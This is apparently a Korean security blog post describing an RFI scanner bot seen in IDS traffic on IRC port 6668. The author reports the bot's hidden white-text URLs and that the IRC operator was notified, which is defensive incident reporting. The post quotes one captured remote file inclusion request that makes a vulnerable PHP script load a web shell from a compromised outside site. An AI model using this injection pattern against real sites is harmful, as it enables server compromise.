IDS에서 실시간 트래픽보다가 6668 포트를 확인해보니 이상한 녀석이 있더군요...
검색해보니 RFI Scanner Bot이라는 녀석과 관계가 있는 듯 합니다.
첫번째 그림에 보시면 hxxp://perfectdate.com.au로 시작하는 링크가 있는데 블럭 지정해보면 아래와 같이 나옵니다.
hxxp://61.19.249.84:32000//accounts/inc/include.php?language=0&lang_settings[0][1]=http://perfectdate.com.au/temp/cache/userimages/shell.txt??
글씨를 흰색으로 해서 안보이게 했나봅니다. -_-;;
그런데 눈에 안보이는 URL이 계속 바뀌고 있었습니다. perfectdate.com.au에 있는 shell.txt는 웹쉘로 보이고
여러 사이트를 해킹해서 링크를 걸어 둔 것으로 보입니다.
중간중간에 "Yahoo 숫자 숫자"나 "Yahoo FiNizZ!"와 같은 문자열이 나오는데 이게 Yahoo도 있고 Lycos, Google, AllTheWeb, Hotbot과 같은 문자열도 있습니다.
자세한 내용은 아래 링크를...
http://nchovy.kr/forum/2/article/326
참고로 위에 나온 IRC는 국내 업체 서버라 통보해줬고 조만간 조치가 될 것으로 보입니다.
